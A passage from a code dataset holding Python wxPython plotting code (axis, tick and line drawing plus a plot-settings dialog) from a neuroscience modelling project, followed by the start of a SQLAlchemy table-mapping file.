plot.xscale\n yfrom = plot.yfrom * plot.yscale\n yto = plot.yto * plot.yscale\n \n gc.SetPen(wx.BLACK_PEN)\n gc.SetFont(self.textfont, self.colourpen['black'])\n \n xaxislength = xplot\n #if(plot.axistrace && drawX != -1) xaxislength = drawX * binsize / (xto - xfrom) * xplot\n #mod->diagbox->Write(text.Format(\"drawX %.0f xfrom %.0f xto %.0f xplot %d xaxislength %d\\n\", drawX, xfrom, xto, xplot, xaxislength))\n \n # Draw Axes\n if plot.xaxis: \n gc.StrokeLine(xbase, ybase + yplot, xbase + xaxislength + self.xstretch, ybase + yplot)\n if plot.yaxis: \n gc.StrokeLine(xbase, ybase, xbase, ybase + yplot)\n\n # Draw Axes Ticks and Labels\n\n # tickmode 0 - off | 1 - count | 2 - step\n \n # labelmode 0 - none | 1 - normal | 2 - only end labels\n \n # scalemode 0 - linear | 1 - log\n\n # X-axis\n if plot.xtickmode == 2:\n xlabels = int((xto - xfrom) / (plot.xscale * plot.xstep))\n xplotstep = (xplot * plot.xstep) / (xto - xfrom)\n if xfrom != 0: xtickshift = xfrom\n else: xtickshift = 0\n xtickstart = abs(xtickshift) * xplotstep\n\n if plot.xscalemode == 1 and xfrom > 0: xlogmax = log(xto / xfrom) / log(xlogbase)\n else: xlogmax = 0\n\n if plot.yscalemode == 1 and yfrom > 0: ylogmax = log(yto / yfrom) / log(ylogbase)\n else: ylogmax = 0\n\n for i in range(0, xlabels+1):\n\n #Ticks\n if plot.xtickmode == 2: xcoord = (int(xplotstep * i) + xtickstart)\n else: xcoord = int(i * xplot / xlabels)\n if plot.xtickmode and xcoord <= xaxislength:\n gc.StrokeLine(xbase + xcoord, ybase + yplot, xbase + xcoord, ybase + yplot + plot.xticklength)\n\n\n #DiagWrite(f\"xfrom {xfrom} xto {xto} xlabels {xlabels} plot.xscale {plot.xscale} plot.xunitscale {plot.xunitscale}\\n\")\n\n # Labels\n if not plot.xlabelmode or xcoord > xaxislength or plot.xlabelmode == 2 and i > 0 and i < xlabels: continue\n if plot.xtickmode == 2:\n xval = (xfrom + plot.xstep * i) * plot.xunitscale / plot.xunitdscale - plot.xshift - xtickshift\n else:\n xval = ((xto - xfrom) / xlabels * i + xfrom) / plot.xscale * plot.xunitscale / plot.xunitdscale - plot.xshift\n\n srangex = abs((xto - xfrom) / plot.xscale * plot.xunitscale / plot.xunitdscale)\n if plot.xlabelplaces == -1:\n if srangex < 0.1: snum = \"{:.3f}\".format(xval + plot.xdis)\n elif srangex < 1: snum = \"{:.2f}\".format(xval + plot.xdis)\n elif srangex < 10: snum = \"{:.1f}\".format(xval + plot.xdis)\n else: snum = \"{:.0f}\".format(xval + plot.xdis) \n else: snum = f\"{xval + plot.xdis:.{plot.xlabelplaces}f}\"\n\n if GetSystem() == \"Mac\":\n textsize = gc.GetFullTextExtent(snum)\n gc.DrawText(snum, xbase + xcoord - textsize[0] / 2, ybase + yplot + 8)\n else:\n #gc.GetTextExtent(snum, &textwidth, &textheight)\n #gc->DrawText(snum, xbase + xcoord - textwidth / 2, ybase + yplot + 10)\n textsize = gc.GetTextExtent(snum)\n gc.DrawText(snum, xbase + xcoord - textsize[0] / 2, ybase + yplot + 10)\n\n\n # Y-axis\n if plot.ytickmode == 2:\n ylabels = int((yto - yfrom) / (plot.yscale * plot.ystep))\n yplotstep = (xplot * plot.xstep) / (yto - yfrom)\n\n for i in range(0, ylabels+1):\n\n #Ticks\n if plot.ytickmode == 2: ycoord = int(yplotstep * i)\n else: ycoord = int(i * yplot / ylabels)\n if plot.ytickmode:\n gc.StrokeLine(xbase, ybase + yplot - ycoord, xbase - plot.yticklength, ybase + yplot - ycoord)\n\n # Labels\n if not plot.ylabelmode or plot.ylabelmode == 2 and i > 0 and i < ylabels: continue\n if plot.ytickmode == 2:\n yval = (yfrom + plot.ystep * i) * plot.yunitscale / plot.yunitdscale - plot.yshift\n else:\n yval = ((yto - yfrom) / ylabels * i + yfrom) / plot.yscale * plot.yunitscale / plot.yunitdscale - plot.yshift\n\n srangey = abs((yto - yfrom) / plot.yscale * plot.yunitscale / plot.yunitdscale)\n if plot.ylabelplaces == -1:\n if srangey < 0.1: snum = \"{:.3f}\".format(yval)\n elif srangey < 1: snum = \"{:.2f}\".format(yval)\n elif srangey < 10: snum = \"{:.1f}\".format(yval)\n else: snum = \"{:.0f}\".format(yval) \n else: snum = f\"{yval + plot.ydis:.{plot.ylabelplaces}f}\"\n\n if GetSystem() == \"Mac\":\n textsize = gc.GetFullTextExtent(snum)\n gc.DrawText(snum, xbase - xylab - plot.yticklength - textsize[0], ybase + yplot - ycoord - textsize[1] / 2)\n else:\n textsize = gc.GetFullTextExtent(snum)\n gc.DrawText(snum, xbase - xylab - plot.yticklength - textsize[0], ybase + yplot - ycoord - textsize[1] / 2)\n\n\n # Plot Label\n if self.yplot < 150: gc.SetFont(self.textfont, self.colourpen['black'])\n textsize = gc.GetTextExtent(plot.label)\n gc.DrawText(plot.label, xbase + xplot - textsize[0], 30 + 15 * gplot)\n\n # Set plot colour\n gc.SetPen(wx.Pen(self.colourpen[plot.colour]))\n\n # Set drawing scales\n xto /= plot.binsize\n xfrom /= plot.binsize\n\n # xrange - pixels per x unit\n # xnum - x units per pixel\n\n yrange = yplot / (yto - yfrom)\n xrange = xplot / (xto - xfrom)\n xnum = (xto - xfrom) / xplot\n\n\n if plot.data.empty: \n #DiagWrite(\"OnPaint: plot {} - no data\\n\".format(plot.label))\n return\n\n\n if plot.type == \"line\": # line graph with scaling fix\n # mod->diagbox->Write(text.Format(\"line plot xrange %.4f yscalemode %d ylogbase %.4f ylogmax %.4f\\n\", xrange, plot.yscalemode, ylogbase, ylogmax))\n dir = 1\n pdir = 0\n xindex = int(plot.xfrom)\n maxdex = len(plot.data) - 1\n if xindex > maxdex: break\n preval = plot.data[xindex]\n oldx = xbase + xoffset\n oldy = yplot + ybase - yrange * (preval - yfrom)\n\n path = gc.CreatePath()\n path.MoveToPoint(oldx, oldy)\n\n # subpixel scale drawing mode - drawing data in limited x-axis resolution\n # xrange gives ratio of plot pixels to data points, use this mode if xrange < 1\n #\n # attempt to preserve maxima and minima\n # 'dir' gives current direction of plot progression\n # 'xnum' gives number of data points for current pixel position, reciprocal of xrange\n # choose lowest or highest data point for plot value depending on direction\n\n if xrange < 1: xcount = xplot\n else:\n xcount = int(xplot / xrange)\n if xcount < 1: xcount = 1\n\n for i in range(xcount):\n if(xrange < 1):\n xindex = int((i * xnum) + xfrom)\n if maxdex and maxdex < xindex: # check for end of recorded data range\n # mainwin->diagbox->Write(text.Format(\"data end xcount %d i %d xnum %.4f xindex %d maxdex %d\\n\", xcount, i, xnum, xindex, gdatadv->maxdex()))\n break \n mpoint = plot.data[xindex]\n if isinf(mpoint): break \n\n #if drawdiag: fprintf(ofp, \"xdraw %d preval %.4f dir %d\\n\", i, preval, dir)\n for j in range(1, int(xnum)):\n if xindex + j > maxdex: break\n data = plot.data[xindex + j]\n #if(drawdiag) fprintf(ofp, \"xdraw %d, xnum %d, data %.4f\\n\", i, j, data)\n if dir:\n if data > mpoint: mpoint = data\n elif data < mpoint: mpoint = data\n\n if preval <= mpoint or preval < 0.000001: dir = 1 \n else: dir = 0\n yval = mpoint\n preval = mpoint\n #if(drawdiag) fprintf(ofp, \"xdraw %d preval %.4f mpoint %.4f point %.4f\\n\", i, preval, mpoint, y)\n\n if plot.yscalemode == 1 and yfrom > 0: \n ypos = yplot * (log(yval / yfrom) / log(ylogbase)) / ylogmax # log scaled y-axis March 2018\n if yval < yfrom: ypos = -yfrom * yrange\n #mod->diagbox->Write(text.Format(\"line draw log low value yval %.4f ypos %d\\n\", yval, ypos))\n else: ypos = (yval - yfrom) * yrange\n\n if isinf(ypos) or isnan(ypos): break\n\n #gc.StrokeLine(oldx, oldy, i + xbase + xoffset, int(yplot + ybase - ypos))\n #path.MoveToPoint(oldx, oldy)\n path.AddLineToPoint(i + xbase + xoffset, int(yplot + ybase - ypos))\n oldx = i + xbase + xoffset\n oldy = int(yplot + ybase - ypos)\n\n else:\n xindex = int(i + xfrom)\n if maxdex and maxdex < xindex: break # check for end of recorded data range\n yval = plot.data[xindex]\n\n if plot.yscalemode == 1 and yfrom > 0: \n ypos = yplot * (log(yval / yfrom) / log(ylogbase)) / ylogmax # log scaled y-axis March 2018\n if yval < yfrom: ypos = -yfrom * yrange\n else: ypos = yrange * (yval - yfrom)\n\n #DiagWrite(\"yplot {} ybase {} ypos {}\\n\".format(yplot, ybase, ypos))\n #DiagWrite(\"oldx {} oldy {} newx {} newy {}\".format(oldx, oldy, int(i * xrange + xbase + xoffset), int(yplot + ybase - ypos)))\n if i < xcount: \n #path.MoveToPoint(oldx, oldy)\n path.AddLineToPoint(int(i * xrange + xbase + xoffset), int(yplot + ybase - ypos))\n #gc.StrokeLine(oldx, oldy, int(i * xrange + xbase + xoffset), int(yplot + ybase - ypos))\n else: \n # interpolate y step for last partial x step\n xremain = xplot + xbase + xoffset - oldx\n portion = xrange / xremain\n if portion > 1: portion = 1 / portion # where x plot range is less than one x step in data\n yremain = oldy - (yplot + ybase - yrange * (yval - yfrom))\n #mainwin->diagbox->Write(text.Format(\"xcount %d xremain %d portion %.2f yremain %.2f\\n\", xcount, xremain, portion, yremain))\n #gc.StrokeLine(oldx, oldy, xplot + xbase + xoffset, oldy - yremain * portion)\n #path.MoveToPoint(oldx, oldy)\n path.AddLineToPoint(xplot + xbase + xoffset, int(oldy - yremain * portion))\n\n oldx = int(i * xrange + xbase + xoffset)\n oldy = int(yplot + ybase - ypos)\n\n gc.DrawPath(path)\n\n\n\nclass PlotCon(ToolBox):\n def __init__(self, plotpanel, title):\n #wx.Dialog.__init__(plotpanel.mainwin, -1, title, wx.DefaultPosition, wx.Size(325, 930), \n # wx.FRAME_FLOAT_ON_PARENT | wx.FRAME_TOOL_WINDOW | wx.CAPTION | wx.SYSTEM_MENU | wx.CLOSE_BOX | wx.RESIZE_BORDER)\n \n #super(PlotCon, self).__init__(None, -1, title, wx.DefaultPosition, wx.Size(320, 600), \n # wx.FRAME_FLOAT_ON_PARENT | wx.FRAME_TOOL_WINDOW | wx.CAPTION | wx.SYSTEM_MENU | wx.CLOSE_BOX | wx.RESIZE_BORDER)\n \n ostype = GetSystem()\n if ostype == \"Windows\": boxheight = 700\n else: boxheight = 600\n ToolBox.__init__(self, plotpanel.mainwin, \"PlotCon\", title, wx.Point(0, 0), wx.Size(320, boxheight), type)\n\n #ToolBox.__init__(self, parent, \"DiagBox\", title, pos, size)\n \n self.plotpanel = plotpanel\n \n autosynch = False\n buttonheight = 23\n boxfont = wx.Font(wx.FontInfo(8).FaceName(\"Tahoma\"))\n confont = wx.Font(wx.FontInfo(8).FaceName(\"Tahoma\"))\n fontset = plotpanel.mainwin.fontset\n pad = 3\n radpad = 3\n\n #panel = ToolPanel(self, wx.DefaultPosition, wx.DefaultSize)\n #panel.SetFont(boxfont)\n #mainbox = wx.BoxSizer(wx.VERTICAL)\n #panel.SetSizer(mainbox)\n\n self.paramset = ParamSet(self.panel)\n parambox = wx.BoxSizer(wx.HORIZONTAL)\n\n labelwidth = 40\n numwidth = 50\n if ostype == 'Mac': labelwidth = 50\n self.plot = plotpanel.GetFrontPlot()\n self.paramset.AddNum(\"xlabels\", \"X Count\", self.plot.xlabels, 0, labelwidth, numwidth)\n self.paramset.AddNum(\"xstep\", \"X Step\", self.plot.xstep, 2, labelwidth, numwidth)\n self.paramset.AddNum(\"ylabels\", \"Y Count\", self.plot.ylabels, 0, labelwidth, numwidth)\n self.paramset.AddNum(\"ystep\", \"Y Step\", self.plot.ystep, 2, labelwidth, numwidth)\n tickparams = self.ParamLayout(2)\n\n xtickradbox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"X Ticks\")\n self.xtickrad = []\n self.xtickrad.append(wx.RadioButton(self.panel, 0, \"None\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.xtickrad.append(wx.RadioButton(self.panel, 1, \"Count\"))\n self.xtickrad.append(wx.RadioButton(self.panel, 2, \"Step\"))\n xtickradbox.Add(self.xtickrad[0], 1, wx.TOP | wx.BOTTOM, pad)\n xtickradbox.Add(self.xtickrad[1], 1, wx.TOP | wx.BOTTOM, pad)\n xtickradbox.Add(self.xtickrad[2], 1, wx.TOP | wx.BOTTOM, pad)\n self.xtickrad[self.plot.xtickmode].SetValue(True)\n\n xlabradbox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"X Labels\")\n self.xlabrad = []\n self.xlabrad.append(wx.RadioButton(self.panel, 100, \"None\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.xlabrad.append(wx.RadioButton(self.panel, 101, \"All\"))\n self.xlabrad.append(wx.RadioButton(self.panel, 102, \"Ends\"))\n xlabradbox.Add(self.xlabrad[0], 1, wx.TOP | wx.BOTTOM, pad)\n xlabradbox.Add(self.xlabrad[1], 1, wx.TOP | wx.BOTTOM, pad)\n xlabradbox.Add(self.xlabrad[2], 1, wx.TOP | wx.BOTTOM, pad)\n if self.plot.xlabelmode >= 0 and self.plot.xlabelmode < 3: self.xlabrad[self.plot.xlabelmode].SetValue(True)\n else: DiagWrite(f\"ERROR xlabelmode {self.plot.xlabelmode}\\n\")\n\n ytickradbox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"Y Ticks\")\n self.ytickrad = []\n self.ytickrad.append(wx.RadioButton(self.panel, 3, \"None\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.ytickrad.append(wx.RadioButton(self.panel, 4, \"Count\"))\n self.ytickrad.append(wx.RadioButton(self.panel, 5, \"Step\"))\n ytickradbox.Add(self.ytickrad[0], 1, wx.TOP | wx.BOTTOM, pad)\n ytickradbox.Add(self.ytickrad[1], 1, wx.TOP | wx.BOTTOM, pad)\n ytickradbox.Add(self.ytickrad[2], 1, wx.TOP | wx.BOTTOM, pad)\n self.ytickrad[self.plot.ytickmode].SetValue(True)\n\n ylabradbox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"Y Labels\")\n self.ylabrad = []\n self.ylabrad.append(wx.RadioButton(self.panel, 200, \"None\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.ylabrad.append(wx.RadioButton(self.panel, 201, \"All\"))\n self.ylabrad.append(wx.RadioButton(self.panel, 202, \"Ends\"))\n ylabradbox.Add(self.ylabrad[0], 1, wx.TOP | wx.BOTTOM, pad)\n ylabradbox.Add(self.ylabrad[1], 1, wx.TOP | wx.BOTTOM, pad)\n ylabradbox.Add(self.ylabrad[2], 1, wx.TOP | wx.BOTTOM, pad)\n if self.plot.ylabelmode >= 0 and self.plot.ylabelmode < 3: self.ylabrad[self.plot.ylabelmode].SetValue(True)\n else: DiagWrite(f\"ERROR ylabelmode {self.plot.ylabelmode}\\n\")\n\n radbox = wx.BoxSizer(wx.HORIZONTAL)\n radbox.Add(xtickradbox, 1, wx.ALL, radpad)\n radbox.Add(xlabradbox, 1, wx.ALL, radpad)\n radbox.Add(ytickradbox, 1, wx.ALL, radpad)\n radbox.Add(ylabradbox, 1, wx.ALL, radpad)\n\n # Scale mode controls\n xscalemodebox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"X Scale\")\n self.xscalerad = []\n self.xscalerad.append(wx.RadioButton(self.panel, 10, \"Linear\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.xscalerad.append(wx.RadioButton(self.panel, 11, \"Log\"))\n xscalemodebox.Add(self.xscalerad[0], 1, wx.TOP | wx.BOTTOM, pad)\n xscalemodebox.Add(self.xscalerad[1], 1, wx.TOP | wx.BOTTOM, pad)\n self.xscalerad[self.plot.xscalemode].SetValue(True)\n\n yscalemodebox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"Y Scale\")\n self.yscalerad = []\n self.yscalerad.append(wx.RadioButton(self.panel, 12, \"Linear\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.yscalerad.append(wx.RadioButton(self.panel, 13, \"Log\"))\n yscalemodebox.Add(self.yscalerad[0], 1, wx.TOP | wx.BOTTOM, pad)\n yscalemodebox.Add(self.yscalerad[1], 1, wx.TOP | wx.BOTTOM, pad)\n self.yscalerad[self.plot.yscalemode].SetValue(True)\n\n # Axis mode controls\n xaxisbox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"X Axis\")\n self.xaxisrad = []\n self.xaxisrad.append(wx.RadioButton(self.panel, 300, \"Off\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.xaxisrad.append(wx.RadioButton(self.panel, 301, \"On\"))\n xaxisbox.Add(self.xaxisrad[0], 1, wx.TOP | wx.BOTTOM, pad)\n xaxisbox.Add(self.xaxisrad[1], 1, wx.TOP | wx.BOTTOM, pad)\n self.xaxisrad[self.plot.xaxis].SetValue(True)\n\n yaxisbox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"Y Axis\")\n self.yaxisrad = []\n self.yaxisrad.append(wx.RadioButton(self.panel, 400, \"Off\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.yaxisrad.append(wx.RadioButton(self.panel, 401, \"On\"))\n yaxisbox.Add(self.yaxisrad[0], 1, wx.TOP | wx.BOTTOM, pad)\n yaxisbox.Add(self.yaxisrad[1], 1, wx.TOP | wx.BOTTOM, pad)\n self.yaxisrad[self.plot.yaxis].SetValue(True)\n\n scalemoderadbox = wx.BoxSizer(wx.HORIZONTAL)\n scalemoderadbox.Add(xaxisbox, 1, wx.ALL, radpad)\n scalemoderadbox.Add(xscalemodebox, 1, wx.ALL, radpad)\n scalemoderadbox.Add(yscalemodebox, 1, wx.ALL, radpad)\n scalemoderadbox.Add(yaxisbox, 1, wx.ALL, radpad)\n\n numwidth = 50\n self.paramset.AddNum(\"xshift\", \"XShift\", self.plot.xshift, 2, labelwidth, numwidth)\n self.paramset.AddNum(\"xscale\", \"XScale\", self.plot.xunitscale, 4, labelwidth, numwidth)\n self.paramset.AddNum(\"xdscale\", \"XDScale\", self.plot.xunitdscale, 1, labelwidth, numwidth)\n self.paramset.AddNum(\"xplot\", \"Width\", self.plot.xplot, 0, labelwidth, numwidth)\n #self.paramset.AddNum(\"xlogbase\", \"XLogB\", self.plot.xlogbase, 4, labelwidth, numwidth)\n self.paramset.AddNum(\"xlabelgap\", \"X Gap\", self.plot.xlabelgap, 0, labelwidth, numwidth)\n self.paramset.AddNum(\"xlabelplaces\", \"X Places\", self.plot.xlabelplaces, 0, labelwidth, numwidth)\n self.paramset.AddNum(\"barwidth\", \"Bar Wid\", self.plot.barwidth, 0, labelwidth, numwidth)\n self.paramset.AddNum(\"yshift\", \"YShift\", self.plot.yshift, 2, labelwidth, numwidth)\n self.paramset.AddNum(\"yscale\", \"YScale\", self.plot.yunitscale, 4, labelwidth, numwidth)\n self.paramset.AddNum(\"ydscale\", \"YDScale\", self.plot.yunitdscale, 1, labelwidth, numwidth)\n self.paramset.AddNum(\"yplot\", \"Height\", self.plot.yplot, 0, labelwidth, numwidth)\n #self.paramset.AddNum(\"ylogbase\", \"YLogB\", self.plot.ylogbase, 4, labelwidth, numwidth)\n self.paramset.AddNum(\"ylabelgap\", \"Y Gap\", self.plot.ylabelgap, 0, labelwidth, numwidth)\n self.paramset.AddNum(\"ylabelplaces\", \"Y Places\", self.plot.ylabelplaces, 0, labelwidth, numwidth)\n self.paramset.AddNum(\"bargap\", \"Bar Gap\", self.plot.bargap, 0, labelwidth, numwidth)\n plotparams = self.ParamLayout(2)\n\n self.paramset.GetCon(\"xshift\").SetMinMax(-100000, 100000)\n self.paramset.GetCon(\"yshift\").SetMinMax(-100000, 100000)\n self.paramset.GetCon(\"xlabelplaces\").SetMinMax(-1, 100)\n self.paramset.GetCon(\"ylabelplaces\").SetMinMax(-1, 100)\n\n samplebox = wx.BoxSizer(wx.HORIZONTAL)\n self.paramset.AddNum(\"xsample\", \"XSample\", self.plot.xsample, 0, labelwidth, numwidth)\n samplebox.Add(self.paramset.GetCon(\"xsample\"), 0, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL)\n clipcheck = wx.CheckBox(self.panel, ID_ClipMode, \"Clip\")\n clipcheck.SetFont(confont)\n clipcheck.SetValue(self.plot.clipmode)\n samplebox.AddSpacer(40)\n samplebox.Add(clipcheck, 0, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL)\n samplebox.AddSpacer(25)\n self.paramset.currlay += 1\n\n self.paramset.AddText(\"label\", \"Name\", self.plot.label, labelwidth)\n self.paramset.AddText(\"xtitle\", \"X Label\", self.plot.xtitle, labelwidth)\n self.paramset.AddText(\"ytitle\", \"Y Label\", self.plot.ytitle, labelwidth)\n labelparams = self.ParamLayout(1)\n\n buttonbox = wx.BoxSizer(wx.HORIZONTAL)\n okButton = wx.Button(self.panel, wx.ID_OK, \"Ok\", wx.DefaultPosition, wx.Size(65, 30))\n printButton = wx.Button(self.panel, ID_Print, \"Export EPS\", wx.DefaultPosition, wx.Size(65, 30))\n closeButton = wx.Button(self.panel, wx.ID_CANCEL, \"Close\", wx.DefaultPosition, wx.Size(65, 30))\n buttonbox.Add(okButton, 1)\n buttonbox.Add(printButton, 1, wx.LEFT, 5)\n buttonbox.Add(closeButton, 1, wx.LEFT, 5)\n\n self.mainbox.AddSpacer(5)\n self.mainbox.Add(tickparams, 0, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL|wx.ALL, 0)\n #mainbox.AddStretchSpacer()\n self.mainbox.Add(radbox, 0, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL|wx.ALL, radpad)\n #mainbox.AddStretchSpacer()\n self.mainbox.Add(scalemoderadbox, 0, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL|wx.ALL, radpad)\n self.mainbox.AddStretchSpacer()\n self.mainbox.Add(plotparams, 0, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL|wx.ALL, 0)\n self.mainbox.Add(samplebox, 0, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL|wx.ALL, 0)\n self.mainbox.AddSpacer(5)\n self.mainbox.AddStretchSpacer()\n self.mainbox.Add(labelparams, 0, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL|wx.ALL, 0)\n self.mainbox.AddStretchSpacer()\n self.mainbox.Add(buttonbox, 0, wx.ALIGN_CENTRE | wx.TOP | wx.BOTTOM, 5)\n #mainbox->Add(statusbox, 0, wxEXPAND);\n\n self.panel.Layout()\n self.Raise()\n self.Show()\n\n\n def SetGraph(self, newplotpanel = None):\n self.SetParams()\t# read and store params for previous plot\n if newplotpanel: self.plotpanel = newplotpanel # default newgraphwin = None for updating panel without changing graph window\n self.plot = self.plotpanel.GetFrontPlot()\n self.SetControls() # load new plot params and set controls\n\n\n def SetParams(self, setplot = None):\n \n params = self.paramset.GetParams()\n if setplot: self.plot = setplot\n\n self.plot.xlabels = params[\"xlabels\"]\n self.plot.ylabels = params[\"ylabels\"]\n self.plot.xstep = params[\"xstep\"]\n self.plot.ystep = params[\"ystep\"]\n self.plot.xplot = params[\"xplot\"]\n self.plot.yplot = params[\"yplot\"]\n self.plot.xshift = params[\"xshift\"]\n self.plot.xsample = params[\"xsample\"]\n self.plot.xunitscale = params[\"xscale\"]\n self.plot.xunitdscale = params[\"xdscale\"]\n #self.plot.plotstroke = params[\"plotstroke\"]\n self.plot.xlabelgap = params[\"xlabelgap\"]\n self.plot.ylabelgap = params[\"ylabelgap\"]\n self.plot.xlabelplaces = params[\"xlabelplaces\"]\n self.plot.ylabelplaces = params[\"ylabelplaces\"]\n #self.plot.labelfontsize = params[\"labelfontsize\"]\n #self.plot.scattersize = params[\"scattersize\"]\n self.plot.yunitscale = params[\"yscale\"]\n self.plot.yunitdscale = params[\"ydscale\"]\n self.plot.yshift = params[\"yshift\"]\n\n self.plot.barwidth = params[\"barwidth\"]\n self.plot.bargap = params[\"bargap\"]\n\n #self.plot.linemode = linecheck.GetValue()\n #self.plot.clipmode = clipcheck.GetValue()\n ##self.plot.scattermode = scattercheck->GetValue();\n #self.plot.fillmode = fillcheck.GetValue()\n\n #self.plot.fillstroke = fillstrokecheck.GetValue()\n #self.plot.strokecolour = strokepicker.GetColour()\n #self.plot.fillcolour = fillpicker.GetColour()\n #self.plot.colour = custom\n\n self.plot.label = self.paramset.GetCon(\"label\").GetText()\n self.plot.xtitle = self.paramset.GetCon(\"xtitle\").GetText()\n self.plot.ytitle = self.paramset.GetCon(\"ytitle\").GetText()\n\n #self.plot.xlogbase = params[\"xlogbase\"]\n #self.plot.ylogbase = params[\"ylogbase\"]\n\n\n def SetControls(self):\n\n self.paramset.GetCon(\"label\").SetValue(self.plot.label)\n self.paramset.GetCon(\"xtitle\").SetValue(self.plot.xtitle)\n self.paramset.GetCon(\"ytitle\").SetValue(self.plot.ytitle)\n\n self.paramset.GetCon(\"xlabels\").SetValue(self.plot.xlabels)\n self.paramset.GetCon(\"ylabels\").SetValue(self.plot.ylabels)\n self.paramset.GetCon(\"xstep\").SetValue(self.plot.xstep)\n self.paramset.GetCon(\"ystep\").SetValue(self.plot.ystep)\n self.paramset.GetCon(\"xplot\").SetValue(self.plot.xplot)\n self.paramset.GetCon(\"yplot\").SetValue(self.plot.yplot)\n self.paramset.GetCon(\"xshift\").SetValue(self.plot.xshift)\n self.paramset.GetCon(\"xsample\").SetValue(self.plot.xsample)\n self.paramset.GetCon(\"xscale\").SetValue(self.plot.xunitscale)\n self.paramset.GetCon(\"xdscale\").SetValue(self.plot.xunitdscale)\n self.paramset.GetCon(\"xlabelgap\").SetValue(self.plot.xlabelgap)\n self.paramset.GetCon(\"ylabelgap\").SetValue(self.plot.ylabelgap)\n self.paramset.GetCon(\"xlabelplaces\").SetValue(self.plot.xlabelplaces)\n self.paramset.GetCon(\"ylabelplaces\").SetValue(self.plot.ylabelplaces)\n #self.paramset.GetCon(\"plotstroke\").SetValue(self.plot.plotstroke)\n #self.paramset.GetCon(\"labelfontsize\").SetValue(self.plot.labelfontsize)\n #self.paramset.GetCon(\"scattersize\").SetValue(self.plot.scattersize)\n self.paramset.GetCon(\"yscale\").SetValue(self.plot.yunitscale)\n self.paramset.GetCon(\"ydscale\").SetValue(self.plot.yunitdscale)\n self.paramset.GetCon(\"yshift\").SetValue(self.plot.yshift)\n\n #self.clipcheck.SetValue(self.plot.clipmode)\n #self.linecheck.SetValue(self.plot.linemode)\n ##scattercheck.SetValue(self.plot.scattermode)\n #self.fillcheck.SetValue(self.plot.fillmode)\n #self.fillstrokecheck.SetValue(self.plot.fillstroke)\n #self.symbolrad[self.plot.scattermode].SetValue(True)\n\n self.xtickrad[self.plot.xtickmode].SetValue(True)\n self.ytickrad[self.plot.ytickmode].SetValue(True)\n self.xlabrad[self.plot.xlabelmode].SetValue(True)\n self.ylabrad[self.plot.ylabelmode].SetValue(True)\n self.xscalerad[self.plot.xscalemode].SetValue(True)\n self.yscalerad[self.plot.yscalemode].SetValue(True)\n self.xaxisrad[self.plot.xaxis].SetValue(True)\n self.yaxisrad[self.plot.yaxis].SetValue(True)\n\n #self.strokepicker.SetColour(self.plot.strokecolour)\n #self.fillpicker.SetColour(self.plot.fillcolour)\n\n #self.typechoice.SetSelection(self.typeset.GetIndex(self.plot.type))\n #self.fontchoice.SetSelection(self.fontset.GetIndex(self.plot.labelfont))\n\n\n def ParamLayout(self, numcols = 1): \n # paramset.currlay allows repeated use after adding more parameters, for separate layout\n \n colsize = 0\n box = wx.BoxSizer(wx.HORIZONTAL)\n numparams = self.paramset.NumParams() - self.paramset.currlay\n\n if numcols == 1: colsize = numparams\n if numcols >= 2: colsize = int((numparams + 1) / numcols) \n\n #print(colsize)\n\n pstart = self.paramset.currlay\n for col in range(numcols):\n if col == numcols-1: pstop = self.paramset.currlay + numparams\n else: pstop = self.paramset.currlay + colsize * (col+1)\n #print(f\"col {col} pstart {pstart} pstop {pstop}\")\n vbox = wx.BoxSizer(wx.VERTICAL)\n vbox.AddSpacer(5)\n for pindex in range(pstart, pstop):\n vbox.Add(list(self.paramset.pcons.values())[pindex], 1, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL|wx.RIGHT|wx.LEFT, 5)\n vbox.AddSpacer(5)\n box.Add(vbox, 0)\n pstart = pstop\n\n self.paramset.currlay = self.paramset.NumParams()\n return box\n\n\n","repo_name":"HypoModel/HypoModPython","sub_path":"hypograph.py","file_name":"hypograph.py","file_ext":"py","file_size_in_byte":46378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28907914131","text":"import logging\nfrom sqlalchemy import (\n Table, MetaData, Column, Integer, String, Date, JSON, ForeignKey,\n)\nfrom sqlalchemy.orm import mapper, relationship\nfrom src.statistics.models.UploadedFile import UploadedFile\nfrom src.statistics.models.Statistics import Statistics\n\nlogger = logging.getLogger(__name__)\n\nmetadata = MetaData()\n\nuploaded_file = Table(\n 'uploaded_file', metadata,\n Column('id', Integer, primary_key=True, autoincrement=True),\n Column('name', String(50)),\n Column('checksum', String(50)),\n Column('size', Integer),\n Column('row', Integer),\n Column('column', Integer),\n)\nstatistics = Table(\n 'statistics', metadata,\n Column('id', Integer, primary_key=True, autoincrement=True),\n Column('file_id', ForeignKey('uploaded_file.id')),\n Column('name', String(50)),\n Column('description', String(2048)),\n Column('data_description', JSON(2048)),\n\n)\n\ndef start_mappers():\n logger.info(\"Starting mappers\")\n uploaded_files = mapper(UploadedFile, 